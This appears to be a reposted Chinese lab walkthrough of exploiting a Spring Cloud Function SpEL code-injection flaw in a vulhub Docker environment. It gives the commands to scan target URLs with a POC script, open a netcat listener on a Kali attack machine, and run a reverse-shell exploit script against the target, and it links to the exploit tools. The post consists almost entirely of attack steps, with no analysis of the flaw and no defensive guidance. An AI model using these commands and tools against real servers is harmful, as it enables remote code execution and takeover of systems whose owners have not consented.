Spring Cloud Function SpEL 代码注入

Spring Cloud Function SpEL 代码注入 ,第1张

启动vulhub docker环境:

访问:http://192.168.29.130:8080/

Kali攻击机创建url.txt文件加入url

检测漏洞: 

利用工具POC进行探查是否存在SPEL漏洞

python Spel_RCE_POC.py url.txt

存在漏洞的url会显示到succ.txt中

反dshell工具:

Kali机开启1207端口监听:

nc -lvp 1207

执行反dshell poc

python Spel_RCE_Bash_EXP.py http://192.168.29.130:8080/ 192.168.29.128 1207

成功获取到权限:

工具链接:https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/718914.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-25
下一篇 2022-04-25

发表评论

登录后才能评论

评论列表(0条)

保存